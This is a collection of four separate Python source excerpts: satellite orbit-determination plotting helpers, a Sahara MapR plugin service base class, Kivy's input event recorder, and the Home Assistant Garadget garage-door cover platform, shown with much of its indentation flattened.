ax1.legend((s), (l), loc=2, bbox_to_anchor=(0.15,0.9))
return fig
def plot_range_range_rate(x_sat_orbdyn_stm:np.ndarray, x_obs_multiple:np.ndarray, t_sec: np.array):
""" Plots range and range relative to the station
Args:
x_sat_orbdyn_stm (np.ndarray): satellite trajectory array.
x_obs_multiple (np.ndarray): observer positions.
t_sec (np.ndarray): array of timesteps.
"""
if len(x_obs_multiple.shape) == 2:
        x_obs_multiple = np.expand_dims(x_obs_multiple, axis=2)
fig = plt.figure(figsize=(14,14))
n_obs = x_obs_multiple.shape[2]
for i in range(n_obs):
r, rr = range_range_rate(x_sat_orbdyn_stm, x_obs_multiple[:,:,i])
ax1 = fig.add_subplot(n_obs, 2, i*2+1)
ax1.plot(t_sec, r)
ax1.set_xlabel('Time (s)')
ax1.set_ylabel('Range (m)')
ax1.grid(':')
        ax1.title.set_text(f'Station {i} - Range')
ax2 = fig.add_subplot(n_obs, 2, i*2+2)
ax2.plot(t_sec, rr)
ax2.set_xlabel('Time (s)')
ax2.set_ylabel('Range rate (m/s)')
ax2.grid(':')
        ax2.title.set_text(f'Station {i} - Range Rate')
fig.subplots_adjust(hspace=0.3)
return fig
def plot_pos_vel_norms(x_sat:np.ndarray, t_sec: np.array):
""" Plots range and range relative to the station
Args:
x_sat_orbdyn_stm (np.ndarray): satellite trajectory array.
x_obs_multiple (np.ndarray): observer positions.
t_sec (np.ndarray): array of timesteps.
"""
r = np.linalg.norm(x_sat[0:3,], axis=0) # Norm of the position
v = np.linalg.norm(x_sat[3:6,], axis=0) # Norm of the velocity
fig = plt.figure(figsize=(14,7))
ax1 = fig.add_subplot(1, 2, 1)
ax1.plot(t_sec, r)
ax1.set_xlabel('Time (s)')
ax1.set_ylabel('Satellite position norm (m)')
ax1.grid(':')
ax1.title.set_text('Position Norm')
ax2 = fig.add_subplot(1, 2, 2)
ax2.plot(t_sec, v)
ax2.set_xlabel('Time (s)')
ax2.set_ylabel('Satellite velocity norm (m/s)')
ax2.grid(':')
ax2.title.set_text('Velocity Norm')
fig.subplots_adjust(hspace=0.25)
return fig
def plot_batch_results(
x_sat_orbdyn_stm:np.ndarray,
x_0r:np.ndarray,
x_br:np.ndarray,
x_berr:np.ndarray
):
""" Plot relevant converged batch results.
Args:
x_sat_orbdyn_stm (np.ndarray): True satellite position.
x_0r (np.ndarray): array of random initial sampled positions.
x_br (np.ndarray): array of batch estimates of initial positions.
x_berr (np.ndarray): array of errors relative to x_0
Returns:
fig
"""
fig = plt.figure(figsize=(14,14))
ax1 = fig.add_subplot(111, projection='3d')
font = {'size': 16}
matplotlib.rc('font', **font)
plt.ticklabel_format(axis="y", style="sci", scilimits=(0,0))
# Groundtruth
ax1.scatter(x_sat_orbdyn_stm[0,0], x_sat_orbdyn_stm[1,0], x_sat_orbdyn_stm[2,0], s=10, marker='x', c = 'r')
x_berr_norm = np.linalg.norm(x_berr, axis=0)
norm_mask = x_berr_norm < 5000
traj = ax1.plot(x_sat_orbdyn_stm[0,:4], x_sat_orbdyn_stm[1,:4], x_sat_orbdyn_stm[2,:4], c='k')
traj_proxy = ax1.scatter(x_sat_orbdyn_stm[0,0], x_sat_orbdyn_stm[1,0], x_sat_orbdyn_stm[2,0], c='k', s=10)
# Batch results
for i in range(x_0r.shape[1]):
if x_berr_norm[i] < 100000:
s1 = ax1.scatter(x_0r[0, i], x_0r[1, i], x_0r[2, i], c='b', s=40, marker='x')
s2 = ax1.scatter(x_br[0, i], x_br[1, i], x_br[2, i], c='r', s=20)
ax1.set_xlabel("x ECI (m)", fontsize=16, labelpad=15)
ax1.set_ylabel("y ECI (m)", fontsize=16, labelpad=15)
ax1.set_zlabel("z ECI (m)", fontsize=16, labelpad=15)
s1_proxy = ax1.scatter(x_0r[0, 0], x_0r[1, 0], x_0r[2, 0], c='b', s=40, marker='x')
s2_proxy = ax1.scatter(x_br[0, 1], x_br[1, 1], x_br[2, 1], c='r', s=20)
ax1.legend((traj_proxy, s1_proxy, s2_proxy),
('Groundtruth trajectory', 'Pre-batch positions', 'Post-batch positions'),
loc=2, bbox_to_anchor=(0.15,0.9))
return fig
def plot_tdoa(tdoa:np.ndarray, tof:np.ndarray, t_sec:np.ndarray, title=None):
""" Plot TDoA measurements.
Args:
tdoa (np.ndarray): time differential of arrival array (n_obs, n).
tof (np.ndarray): time of flight array (n_obs, n).
t_sec (np.ndarray): time array, seconds (n,).
Returns:
fig ():
"""
fig = plt.figure(figsize=(14,7))
font = {'size': 16}
matplotlib.rc('font', **font)
if title is not None:
fig.suptitle(title)
# Reference station time of flight
ax = fig.add_subplot(2, 2, 1)
ax.plot(t_sec, tof[0,:])
ax.set_xlabel('Time (s)', fontsize=16, labelpad=10)
ax.set_ylabel('Time of flight (s)', fontsize=16, labelpad=10)
ax.grid(':')
ax.title.set_text(f"Station 0 ToF")
plt.ticklabel_format(axis="y", style="sci", scilimits=(0,0))
# Time differential of arrival for the rest of three stations
for i in range(tdoa.shape[0]-1):
ax = fig.add_subplot(2, 2, i+2)
ax.plot(t_sec, tdoa[i+1,:])
ax.set_xlabel('Time (s)', fontsize=16, labelpad=10)
ax.set_ylabel('Time differential (s)', fontsize=16, labelpad=10)
ax.grid(':')
ax.title.set_text(f"Station {i+1}-0 TDoA")
plt.ticklabel_format(axis="y", style="sci", scilimits=(0,0))
fig.subplots_adjust(hspace=0.5)
return fig
def plot_tdoa_results(p_sat:np.ndarray, x_obs:np.ndarray, x_sat:np.ndarray=None, angle=None):
""" Plot results of TDoA multilateration.
Args:
p_sat (np.ndarray): multilaterated satellite position (3, n).
x_obs (np.ndarray): observer positions (6, n, n_obs).
x_sat (np.ndarray): groundtruth satellite position (6, n).
Returns:
fig ():
"""
x_obs_mean = np.mean(x_obs,axis=2)
font = {'size': 16}
matplotlib.rc('font', **font)
txtp, txtn = 1.002, 0.998 # Temporary variables - text location
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111, projection='3d')
ax.title.set_text("TDoA Example")
#plot_sphere(ax, d=R_EQ, n=40)
# Observer
obs = ax.scatter(x_obs[0,0,:], x_obs[1,0,:], x_obs[2,0,:], c='b')
for j in range(x_obs.shape[2]):
ax.text(x_obs[0,0,j]*txtp, x_obs[1,0,j]*txtp, x_obs[2,0,j]*txtp, f"Obs_1 {j}",c='k',fontsize=10)
ax.scatter(x_obs[0,:,:], x_obs[1,:,:], x_obs[2,:,:], marker='.', s=0.5, c='b')
# # Mean observer position
# ax.scatter(x_obs_mean[0, :], x_obs_mean[1, :], x_obs_mean[2, :], marker='.', s=1, alpha=0.1)
# ax.text(x_obs_mean[0, 0]*txtn, x_obs_mean[1, 0]*txtn, x_obs_mean[2, 0]*txtn, f"Observer (mean)")
if x_sat is not None:
# Satellite
sat = ax.scatter(x_sat[0,:], x_sat[1,:], x_sat[2,:])
sat_0 = ax.scatter(x_sat[0,0], x_sat[1,0], x_sat[2,0], marker='x')
ax.text(x_sat[0,0]*txtp, x_sat[1,0]*txtp, x_sat[2,0]*txtp, "Satellite")
# Result trajectory
ax.scatter(p_sat[0,:], p_sat[1,:], p_sat[2,:],alpha=0.4,s=0.5,c='k')
res = ax.scatter(p_sat[0,0], p_sat[1,0], p_sat[2,0],c='k')
o = ax.scatter(0,0,0,c='teal')
# Temp legend workaround
if x_sat is not None:
ax.legend([res, sat, sat_0, obs, o],["Result Trajectory", "Groundtruth", "Start", "Observers", "Origin"], loc=2, bbox_to_anchor=(0.15,0.9))
else:
ax.legend([res, obs, o],["Result Trajectory", "Observers", "Origin"], loc=2, bbox_to_anchor=(0.15,0.9))
ax.ticklabel_format(axis="x", style="sci", scilimits=(0,0))
ax.ticklabel_format(axis="y", style="sci", scilimits=(0,0))
ax.ticklabel_format(axis="z", style="sci", scilimits=(0,0))
ax.set_xlabel("x ECI (m)", fontsize=16, labelpad=15)
ax.set_ylabel("y ECI (m)", fontsize=16, labelpad=15)
ax.set_zlabel("z ECI (m)", fontsize=16, labelpad=15)
if angle is not None:
ax.view_init(angle[0], angle[1])
return fig
def plot_tdoa_errors(p_sat, x_sat, title=None):
""" Plots TDoA multilateration errors compared to groundtruth trajectory.
Args:
p_sat (np.ndarray): multilaterated satellite position (3, n).
x_sat (np.ndarray): groundtruth satellite position (6, n).
Returns:
fig ():
"""
tdoa_error = x_sat[0:3,:] - p_sat[0:3,:]
fig = plt.figure(figsize=(14,7))
plt.ticklabel_format(axis="y", style="sci", scilimits=(0,0))
font = {'size': 16}
matplotlib.rc('font', **font)
ax = fig.add_subplot(111)
ax.grid(':')
if title is not None:
ax.title.set_text(title)
xx = ax.plot(tdoa_error[0,:], linewidth=1)
yy = ax.plot(tdoa_error[1,:], linewidth=1)
zz = ax.plot(tdoa_error[2,:], linewidth=1)
ax.set_xlabel("Time (seconds)", fontsize=16, labelpad=10)
ax.set_ylabel("Error (m)", fontsize=16, labelpad=10)
ax.legend(["x","y","z"],loc=0)
return fig
def plot_tdoa_hg_errors(x_sat, t_sec, x_sat_hg, w):
""" Plots TDoA multilateration errors compared to groundtruth trajectory.
Args:
x_sat (np.ndarray): groundtruth satellite state vector (6, n).
t_sec (np.ndarray): time array (n,).
x_sat_hg (np.ndarray): estimated satellite state vector (TDoA+Herrick-Gibbs).
w (np.ndarray): estimated window size.
Returns:
fig ():
"""
t_sat_hg = t_sec[w:-w]
diff = x_sat[:,w:-w] - x_sat_hg
fig = plt.figure(figsize=(14,7))
ax_1 = fig.add_subplot(1,2,1)
xx = ax_1.plot(t_sat_hg, diff[0,:], linewidth=1)
yy = ax_1.plot(t_sat_hg, diff[1,:], linewidth=1)
zz = ax_1.plot(t_sat_hg, diff[2,:], linewidth=1)
ax_1.grid(':')
ax_1.legend(["x","y","z"],loc=0)
ax_1.set_xlabel("Time (seconds)")
ax_1.set_ylabel("Error (m)")
ax_1.title.set_text("Position Error, TDoA + Herrick-Gibbs")
ax_2 = fig.add_subplot(1,2,2)
v_xx = ax_2.plot(t_sat_hg, diff[3,:], linewidth=1)
v_yy = ax_2.plot(t_sat_hg, diff[4,:], linewidth=1)
v_zz = ax_2.plot(t_sat_hg, diff[5,:], linewidth=1)
ax_2.grid(':')
ax_2.legend(["x","y","z"], loc=0)
ax_2.set_xlabel("Time (seconds)")
ax_2.set_ylabel("Error (m/s)")
ax_2.title.set_text("Velocity Error, TDoA + Herrick-Gibbs")
return fig
def save_images(x_sat, x_obs, t_sec=None, prefix="", path=""):
""" Auxiliary function to save the images.
Args:
x_sat (np.ndarray): satellite state vectors (6,n).
        x_obs (np.ndarray): observer state vectors (6,n,n_obs).
t_sec (np.ndarray): time array (n,).
prefix (str): filename prefix.
path (str): save path.
Returns:
None
"""
fig_1 = plot_example_3d(x_sat, x_obs)
fig_1.savefig(os.path.join(path, f"{prefix}_scenario"))
fig_2 = plot_range_range_rate(x_sat, x_obs, t_sec)
fig_2.savefig(os.path.join(path, f"{prefix}_range_range_rate"))
def save_images_batch_results(x_sat, x_0r, x_br, x_berr, prefix="", path=""):
""" Auxiliary function to save the batch result images.
Args:
x_sat (np.ndarray): satellite state vectors (6,n).
x_0r (np.ndarray): vector of pre-batch initial positions (6,n).
        x_br (np.ndarray): vector of post-batch estimated initial positions (6,n).
x_berr(np.ndarray): vector of errors (6,n).
prefix (str): filename prefix.
path (str): save path.
Returns:
None
"""
fig_3 = plot_batch_results(x_sat, x_0r, x_br, x_berr)
    fig_3.savefig(os.path.join(path, f"{prefix}_batch_results"))
|
|
# Copyright (c) 2015, MapR Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
import six
import sahara.exceptions as e
from sahara.i18n import _
import sahara.plugins.exceptions as ex
from sahara.plugins.mapr.util import commands as cmd
from sahara.plugins.mapr.util import event_log as el
from sahara.plugins.mapr.util import general as g
from sahara.plugins.mapr.util import service_utils as su
import sahara.plugins.provisioning as p
from sahara.utils import files as files
LOG = logging.getLogger(__name__)
SERVICE_UI = 'Web UI'
_INSTALL_PACKAGES_TIMEOUT = 3600
@six.add_metaclass(g.Singleton)
class Service(object):
def __init__(self):
self._name = None
self._ui_name = None
self._node_processes = []
self._version = None
self._dependencies = []
self._ui_info = []
self._cluster_defaults = []
self._node_defaults = []
self._validation_rules = []
self._priority = 1
@property
def name(self):
return self._name
@property
def ui_name(self):
return self._ui_name
@property
def version(self):
return self._version
@property
def node_processes(self):
return self._node_processes
@property
def dependencies(self):
return self._dependencies
@property
def cluster_defaults(self):
return self._cluster_defaults
@property
def node_defaults(self):
return self._node_defaults
@property
def validation_rules(self):
return self._validation_rules
def get_ui_info(self, cluster_context):
return self._ui_info
def install(self, cluster_context, instances):
service_instances = cluster_context.filter_instances(instances,
service=self)
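        # The nested helper below is decorated with ``el.provision_step`` (and
        # the per-instance work with ``el.provision_event``) so that package
        # installation is reported step by step in the provisioning event log.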
@el.provision_step(_("Install %s service") % self.ui_name,
cluster_context_reference=0, instances_reference=1)
def _install(_context, _instances):
g.execute_on_instances(_instances,
self._install_packages_on_instance,
_context)
_install(cluster_context, service_instances)
@el.provision_event(instance_reference=1)
def _install_packages_on_instance(self, instance, cluster_context):
processes = [p for p in self.node_processes if
p.ui_name in instance.node_group.node_processes]
        if processes:
packages = self._get_packages(cluster_context, processes)
cmd = cluster_context.distro.create_install_cmd(packages)
with instance.remote() as r:
r.execute_command(cmd, run_as_root=True,
timeout=_INSTALL_PACKAGES_TIMEOUT)
def _get_packages(self, cluster_context, node_processes):
result = []
result += self.dependencies
result += [(np.package, self.version) for np in node_processes]
return result
def _set_service_dir_owner(self, cluster_context, instances):
service_instances = cluster_context.filter_instances(instances,
service=self)
LOG.debug("Changing %s service dir owner" % self.ui_name)
for instance in service_instances:
cmd.chown(instance, 'mapr:mapr', self.service_dir(cluster_context))
def post_install(self, cluster_context, instances):
pass
def post_start(self, cluster_context, instances):
pass
def configure(self, cluster_context, instances=None):
pass
def update(self, cluster_context, instances=None):
pass
def get_file_path(self, file_name):
template = 'plugins/mapr/services/%(service)s/resources/%(file_name)s'
args = {'service': self.name, 'file_name': file_name}
return template % args
def get_configs(self):
result = []
for d_file in self.cluster_defaults:
data = self._load_config_file(self.get_file_path(d_file))
result += [self._create_config_obj(c, self.ui_name) for c in data]
for d_file in self.node_defaults:
data = self._load_config_file(self.get_file_path(d_file))
result += [self._create_config_obj(c, self.ui_name, scope='node')
for c in data]
return result
def get_configs_dict(self):
result = dict()
for conf_obj in self.get_configs():
result.update({conf_obj.name: conf_obj.default_value})
return {self.ui_name: result}
def _load_config_file(self, file_path=None):
return json.loads(files.get_file_text(file_path))
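    # Illustrative sketch (an assumption about the resource files): a defaults
    # file loaded by ``_load_config_file`` is expected to be a JSON list of
    # entries such as
    #   [{"name": "some.property", "value": "42", "priority": 1,
    #     "config_type": "int", "description": "Example entry"}]
    # each of which ``_create_config_obj`` turns into a ``p.Config`` object.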
def get_config_files(self, cluster_context, configs, instance=None):
return []
def _create_config_obj(self, item, target='general', scope='cluster',
high_priority=False):
def _prepare_value(value):
if isinstance(value, str):
return value.strip().lower()
return value
conf_name = _prepare_value(item.get('name', None))
conf_value = _prepare_value(item.get('value', None))
if not conf_name:
raise ex.HadoopProvisionError(_("Config missing 'name'"))
if conf_value is None:
raise e.InvalidDataException(
_("Config '%s' missing 'value'") % conf_name)
if high_priority or item.get('priority', 2) == 1:
priority = 1
else:
priority = 2
return p.Config(
name=conf_name,
applicable_target=target,
scope=scope,
config_type=item.get('config_type', "string"),
config_values=item.get('config_values', None),
default_value=conf_value,
is_optional=item.get('is_optional', True),
description=item.get('description', None),
priority=priority)
def get_version_config(self, versions):
return p.Config(
name='%s Version' % self._ui_name,
applicable_target=self.ui_name,
scope='cluster',
config_type='dropdown',
config_values=[(v, v) for v in sorted(versions, reverse=True)],
is_optional=False,
description=_('Specify the version of the service'),
priority=1)
def __eq__(self, other):
if isinstance(other, self.__class__):
version_eq = self.version == other.version
ui_name_eq = self.ui_name == other.ui_name
return version_eq and ui_name_eq
return NotImplemented
def restart(self, instances):
for node_process in self.node_processes:
filtered_instances = su.filter_by_node_process(instances,
node_process)
if filtered_instances:
node_process.restart(filtered_instances)
def service_dir(self, cluster_context):
args = {'mapr_home': cluster_context.mapr_home, 'name': self.name}
return '%(mapr_home)s/%(name)s' % args
def home_dir(self, cluster_context):
args = {
'service_dir': self.service_dir(cluster_context),
'name': self.name,
'version': self.version,
}
return '%(service_dir)s/%(name)s-%(version)s' % args
def conf_dir(self, cluster_context):
return '%s/conf' % self.home_dir(cluster_context)
def post_configure_sh(self, cluster_context, instances):
pass
def post_configure(self, cluster_context, instances):
pass
|
|
'''
Input recorder
==============
.. versionadded:: 1.1.0
.. warning::
This part of Kivy is still experimental and this API is subject to
change in a future version.
This is a class that can record and replay some input events. This can
be used for test cases, screen savers etc.
Once activated, the recorder will listen for any input event and save its
properties in a file with the delta time. Later, you can play the input
file: it will generate fake touch events with the saved properties and
dispatch it to the event loop.
By default, only the position is saved (the 'pos' profile and the 'sx', 'sy'
attributes). Change this only if you understand how input handling works.
Recording events
----------------
The best way is to use the "recorder" module. Check the :doc:`api-kivy.modules`
documentation to see how to activate a module.
Once activated, you can press F8 to start the recording. By default,
events will be written to `<currentpath>/recorder.kvi`. When you want to
stop recording, press F8 again.
You can replay the file by pressing F7.
Check the :doc:`api-kivy.modules.recorder` module for more information.
Manual play
-----------
You can manually open a recorder file, and play it by doing::
from kivy.input.recorder import Recorder
rec = Recorder(filename='myrecorder.kvi')
rec.play = True
If you want to loop over that file, you can do::
from kivy.input.recorder import Recorder
def recorder_loop(instance, value):
if value is False:
instance.play = True
rec = Recorder(filename='myrecorder.kvi')
rec.bind(play=recorder_loop)
rec.play = True
Recording more attributes
-------------------------
You can extend the attributes to save on one condition: the attribute values
must be simple values, not instances of complex classes.
Let's say you want to save the angle and pressure of the touch, if available::
from kivy.input.recorder import Recorder
rec = Recorder(filename='myrecorder.kvi',
record_attrs=['is_touch', 'sx', 'sy', 'angle', 'pressure'],
record_profile_mask=['pos', 'angle', 'pressure'])
rec.record = True
Or with modules variables::
$ python main.py -m recorder,attrs=is_touch:sx:sy:angle:pressure, \
profile_mask=pos:angle:pressure
Known limitations
-----------------
- Attributes whose values are instances of complex classes cannot be saved.
- Values that represent time will not be adjusted.
- Can replay only complete records. If a begin/update/end event is missing,
this could lead to ghost touches.
- Stopping the replay before the end can lead to ghost touches.
'''
__all__ = ('Recorder', )
from os.path import exists
from time import time
from kivy.event import EventDispatcher
from kivy.properties import ObjectProperty, BooleanProperty, StringProperty, \
NumericProperty, ListProperty
from kivy.input.motionevent import MotionEvent
from kivy.base import EventLoop
from kivy.logger import Logger
from ast import literal_eval
from functools import partial
class RecorderMotionEvent(MotionEvent):
def depack(self, args):
for key, value in list(args.items()):
setattr(self, key, value)
super(RecorderMotionEvent, self).depack(args)
class Recorder(EventDispatcher):
'''Recorder class. Please check module documentation for more information.
:Events:
`on_stop`:
Fired when the playing stops.
.. versionchanged:: 1.10.0
Event `on_stop` added.
'''
window = ObjectProperty(None)
'''Window instance to attach the recorder. If None, it will use the
default instance.
:attr:`window` is a :class:`~kivy.properties.ObjectProperty` and
defaults to None.
'''
counter = NumericProperty(0)
'''Number of events recorded in the last session.
:attr:`counter` is a :class:`~kivy.properties.NumericProperty` and defaults
to 0, read-only.
'''
play = BooleanProperty(False)
'''Boolean to start/stop the replay of the current file (if it exists).
:attr:`play` is a :class:`~kivy.properties.BooleanProperty` and defaults to
False.
'''
record = BooleanProperty(False)
'''Boolean to start/stop the recording of input events.
:attr:`record` is a :class:`~kivy.properties.BooleanProperty` and defaults
to False.
'''
filename = StringProperty('recorder.kvi')
'''Filename to save the output of the recorder.
:attr:`filename` is a :class:`~kivy.properties.StringProperty` and defaults
to 'recorder.kvi'.
'''
record_attrs = ListProperty(['is_touch', 'sx', 'sy'])
'''Attributes to record from the motion event.
:attr:`record_attrs` is a :class:`~kivy.properties.ListProperty` and
defaults to ['is_touch', 'sx', 'sy'].
'''
record_profile_mask = ListProperty(['pos'])
'''Profile to save in the fake motion event when replayed.
:attr:`record_profile_mask` is a :class:`~kivy.properties.ListProperty` and
defaults to ['pos'].
'''
# internals
record_fd = ObjectProperty(None)
record_time = NumericProperty(0.)
__events__ = ('on_stop',)
def __init__(self, **kwargs):
super(Recorder, self).__init__(**kwargs)
if self.window is None:
# manually set the current window
from kivy.core.window import Window
self.window = Window
self.window.bind(
on_motion=self.on_motion,
on_key_up=partial(self.on_keyboard, 'keyup'),
on_key_down=partial(self.on_keyboard, 'keydown'),
on_keyboard=partial(self.on_keyboard, 'keyboard'))
def on_motion(self, window, etype, motionevent):
if not self.record:
return
args = dict((arg, getattr(motionevent, arg))
for arg in self.record_attrs if hasattr(motionevent, arg))
args['profile'] = [x for x in motionevent.profile if x in
self.record_profile_mask]
self.record_fd.write('%r\n' % (
(time() - self.record_time, etype, motionevent.uid, args), ))
self.counter += 1
def on_keyboard(self, etype, window, key, *args, **kwargs):
if not self.record:
return
self.record_fd.write('%r\n' % (
(time() - self.record_time, etype, 0, {
'key': key,
'scancode': kwargs.get('scancode'),
'codepoint': kwargs.get('codepoint', kwargs.get('unicode')),
'modifier': kwargs.get('modifier'),
'is_touch': False}), ))
self.counter += 1
def release(self):
self.window.unbind(
on_motion=self.on_motion,
on_key_up=self.on_keyboard,
on_key_down=self.on_keyboard)
def on_record(self, instance, value):
if value:
            # open the output file and write the recorder file header
self.counter = 0
self.record_time = time()
self.record_fd = open(self.filename, 'w')
self.record_fd.write('#RECORDER1.0\n')
Logger.info('Recorder: Recording inputs to %r' % self.filename)
else:
self.record_fd.close()
Logger.info('Recorder: Recorded %d events in %r' % (self.counter,
self.filename))
# needed for acting as an input provider
def stop(self):
pass
def start(self):
pass
def on_play(self, instance, value):
if not value:
Logger.info('Recorder: Stop playing %r' % self.filename)
EventLoop.remove_input_provider(self)
return
if not exists(self.filename):
Logger.error('Recorder: Unable to find %r file, play aborted.' % (
self.filename))
return
with open(self.filename, 'r') as fd:
data = fd.read().splitlines()
if len(data) < 2:
Logger.error('Recorder: Unable to play %r, file truncated.' % (
self.filename))
return
if data[0] != '#RECORDER1.0':
Logger.error('Recorder: Unable to play %r, invalid header.' % (
self.filename))
return
# decompile data
self.play_data = [literal_eval(x) for x in data[1:]]
self.play_time = time()
self.play_me = {}
Logger.info('Recorder: Start playing %d events from %r' %
(len(self.play_data), self.filename))
EventLoop.add_input_provider(self)
def on_stop(self):
pass
def update(self, dispatch_fn):
if not self.play_data:
Logger.info('Recorder: Playing finished.')
self.play = False
self.dispatch('on_stop')
dt = time() - self.play_time
while self.play_data:
event = self.play_data[0]
assert(len(event) == 4)
if event[0] > dt:
return
me = None
etype, uid, args = event[1:]
if etype == 'begin':
me = RecorderMotionEvent('recorder', uid, args)
self.play_me[uid] = me
elif etype == 'update':
me = self.play_me[uid]
me.depack(args)
elif etype == 'end':
me = self.play_me.pop(uid)
me.depack(args)
elif etype == 'keydown':
self.window.dispatch(
'on_key_down',
args['key'],
args['scancode'],
args['codepoint'],
args['modifier'])
elif etype == 'keyup':
self.window.dispatch(
'on_key_up',
args['key'],
args['scancode'],
args['codepoint'],
args['modifier'])
elif etype == 'keyboard':
self.window.dispatch(
'on_keyboard',
args['key'],
args['scancode'],
args['codepoint'],
args['modifier'])
if me:
dispatch_fn(etype, me)
self.play_data.pop(0)
def start(win, ctx):
ctx.recorder = Recorder(window=win)
def stop(win, ctx):
if hasattr(ctx, 'recorder'):
ctx.recorder.release()
|
|
"""
Platform for the Garadget cover component.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/garadget/
"""
import logging
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.cover import CoverDevice, PLATFORM_SCHEMA
from homeassistant.helpers.event import track_utc_time_change
from homeassistant.const import (
CONF_DEVICE, CONF_USERNAME, CONF_PASSWORD, CONF_ACCESS_TOKEN, CONF_NAME,
STATE_CLOSED, STATE_OPEN, CONF_COVERS)
_LOGGER = logging.getLogger(__name__)
ATTR_AVAILABLE = 'available'
ATTR_SENSOR_STRENGTH = 'sensor_reflection_rate'
ATTR_SIGNAL_STRENGTH = 'wifi_signal_strength'
ATTR_TIME_IN_STATE = 'time_in_state'
DEFAULT_NAME = 'Garadget'
STATE_CLOSING = 'closing'
STATE_OFFLINE = 'offline'
STATE_OPENING = 'opening'
STATE_STOPPED = 'stopped'
STATES_MAP = {
'open': STATE_OPEN,
'opening': STATE_OPENING,
'closed': STATE_CLOSED,
'closing': STATE_CLOSING,
'stopped': STATE_STOPPED
}
COVER_SCHEMA = vol.Schema({
vol.Optional(CONF_ACCESS_TOKEN): cv.string,
vol.Optional(CONF_DEVICE): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_USERNAME): cv.string,
})
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_COVERS): cv.schema_with_slug_keys(COVER_SCHEMA),
})
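# Illustrative configuration.yaml entry for this platform (an assumption-based
# example: the option names come from COVER_SCHEMA above, while the slug key
# and all values are hypothetical):
#
# cover:
#   - platform: garadget
#     covers:
#       garage_door:
#         device: 1234567890abcdef12345678
#         username: YOUR_PARTICLE_EMAIL
#         password: YOUR_PARTICLE_PASSWORD
#         name: Garage Door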
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Garadget covers."""
covers = []
devices = config.get(CONF_COVERS)
for device_id, device_config in devices.items():
args = {
'name': device_config.get(CONF_NAME),
'device_id': device_config.get(CONF_DEVICE, device_id),
'username': device_config.get(CONF_USERNAME),
'password': device_config.get(CONF_PASSWORD),
'access_token': device_config.get(CONF_ACCESS_TOKEN)
}
covers.append(GaradgetCover(hass, args))
add_entities(covers)
class GaradgetCover(CoverDevice):
"""Representation of a Garadget cover."""
def __init__(self, hass, args):
"""Initialize the cover."""
self.particle_url = 'https://api.particle.io'
self.hass = hass
self._name = args['name']
self.device_id = args['device_id']
self.access_token = args['access_token']
        self._obtained_token = False
self._username = args['username']
self._password = args['password']
self._state = None
self.time_in_state = None
self.signal = None
self.sensor = None
self._unsub_listener_cover = None
self._available = True
if self.access_token is None:
self.access_token = self.get_token()
self._obtained_token = True
try:
if self._name is None:
doorconfig = self._get_variable('doorConfig')
if doorconfig['nme'] is not None:
self._name = doorconfig['nme']
self.update()
except requests.exceptions.ConnectionError as ex:
_LOGGER.error(
"Unable to connect to server: %(reason)s", dict(reason=ex))
self._state = STATE_OFFLINE
self._available = False
self._name = DEFAULT_NAME
except KeyError:
_LOGGER.warning("Garadget device %(device)s seems to be offline",
dict(device=self.device_id))
self._name = DEFAULT_NAME
self._state = STATE_OFFLINE
self._available = False
def __del__(self):
"""Try to remove token."""
if self._obtained_token is True:
if self.access_token is not None:
self.remove_token()
@property
def name(self):
"""Return the name of the cover."""
return self._name
@property
def should_poll(self):
"""No polling needed for a demo cover."""
return True
@property
def available(self):
"""Return True if entity is available."""
return self._available
@property
def device_state_attributes(self):
"""Return the device state attributes."""
data = {}
if self.signal is not None:
data[ATTR_SIGNAL_STRENGTH] = self.signal
if self.time_in_state is not None:
data[ATTR_TIME_IN_STATE] = self.time_in_state
if self.sensor is not None:
data[ATTR_SENSOR_STRENGTH] = self.sensor
if self.access_token is not None:
data[CONF_ACCESS_TOKEN] = self.access_token
return data
@property
def is_closed(self):
"""Return if the cover is closed."""
if self._state is None:
return None
return self._state == STATE_CLOSED
@property
def device_class(self):
"""Return the class of this device, from component DEVICE_CLASSES."""
return 'garage'
def get_token(self):
"""Get new token for usage during this session."""
args = {
'grant_type': 'password',
'username': self._username,
'password': self._password
}
url = '{}/oauth/token'.format(self.particle_url)
ret = requests.post(
url, auth=('particle', 'particle'), data=args, timeout=10)
try:
return ret.json()['access_token']
except KeyError:
_LOGGER.error("Unable to retrieve access token")
def remove_token(self):
"""Remove authorization token from API."""
url = '{}/v1/access_tokens/{}'.format(
self.particle_url, self.access_token)
ret = requests.delete(
url, auth=(self._username, self._password), timeout=10)
return ret.text
def _start_watcher(self, command):
"""Start watcher."""
_LOGGER.debug("Starting Watcher for command: %s ", command)
if self._unsub_listener_cover is None:
self._unsub_listener_cover = track_utc_time_change(
self.hass, self._check_state)
def _check_state(self, now):
"""Check the state of the service during an operation."""
self.schedule_update_ha_state(True)
def close_cover(self, **kwargs):
"""Close the cover."""
        if self._state not in [STATE_CLOSED, STATE_CLOSING]:
ret = self._put_command('setState', 'close')
self._start_watcher('close')
return ret.get('return_value') == 1
def open_cover(self, **kwargs):
"""Open the cover."""
if self._state not in ['open', 'opening']:
ret = self._put_command('setState', 'open')
self._start_watcher('open')
return ret.get('return_value') == 1
def stop_cover(self, **kwargs):
"""Stop the door where it is."""
if self._state not in ['stopped']:
ret = self._put_command('setState', 'stop')
self._start_watcher('stop')
return ret['return_value'] == 1
def update(self):
"""Get updated status from API."""
try:
status = self._get_variable('doorStatus')
_LOGGER.debug("Current Status: %s", status['status'])
self._state = STATES_MAP.get(status['status'], None)
self.time_in_state = status['time']
self.signal = status['signal']
self.sensor = status['sensor']
self._available = True
except requests.exceptions.ConnectionError as ex:
_LOGGER.error(
"Unable to connect to server: %(reason)s", dict(reason=ex))
self._state = STATE_OFFLINE
except KeyError:
_LOGGER.warning("Garadget device %(device)s seems to be offline",
dict(device=self.device_id))
